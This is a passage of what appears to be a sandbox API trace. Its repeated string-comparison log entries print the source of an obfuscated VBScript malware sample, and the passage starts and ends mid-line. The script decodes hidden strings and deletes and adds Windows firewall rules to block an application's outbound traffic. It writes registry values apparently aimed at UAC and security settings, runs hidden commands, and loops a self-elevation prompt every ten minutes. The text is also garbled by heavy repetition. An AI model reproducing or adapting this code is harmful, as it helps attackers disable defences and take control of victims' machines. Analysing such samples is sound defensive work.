bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.971] wcsncmp (_String1="\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.971] wcsncmp (_String1="wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0222.971] wcsncmp (_String1="end \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.971] wcsncmp (_String1="nd \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 